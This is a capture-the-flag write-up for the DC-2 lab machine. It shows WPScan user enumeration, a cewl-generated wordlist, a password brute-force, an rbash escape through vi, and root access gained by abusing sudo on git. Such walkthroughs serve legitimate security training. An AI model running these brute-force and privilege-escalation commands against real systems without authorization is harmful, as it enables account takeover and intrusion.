Security Analyst | Security Researcher | CRTP

Proving grounds Play: DC-2

Proving grounds Play - DC-2 CTF writeup.

Nmap

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52517b6e70a4337ad24be10b5a0f9ed7 (DSA)
|   2048 5911d8af38518f41a744b32803809942 (RSA)
|   256 df181d7426cec14f6f2fc12654315191 (ECDSA)
|_  256 d9385f997c0d647e1d46f6e97cc63717 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

make entry in the /etc/hosts file as dc-2 for the attacking machine IP.

Web PORT: 80

img

Techstack

  • Wordpress

WPscan

wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u

Usernames Enumerated

admin
jerry
tom

Hint

As shown in the webpage the wordslist has to be created using the tool named cewl

cewl http://dc-2/ > password

Bruteforce credentials usgin WPscan

wpscan --url http://dc-2/ -U users -P password

Credentials Obtained

img

SSH to the machine using the credentials. The user jerry doesn’t have SSH login permission, so login to user tom.

Escaping rbash

vi
:set shell=/bin/bash
:shell

Type the above commmands to escape from the rbash to standard unix shell.

User tom may not run anything as sudo on machine DC-2. So switch to user jerry.

img

User tom can run /usr/bin/git as sudo.

Search for exploit on GTFO Bins. As per the page the binary can be used to elevate sudo permissions using below commands.

img

sudo git -p help config

# Once the git manual page appears type the below and hit enter
!/bin/bash

Root Shell Obtained

img

Thanks for reading!

For more updates and insights, follow me on Twitter: @thevillagehacker.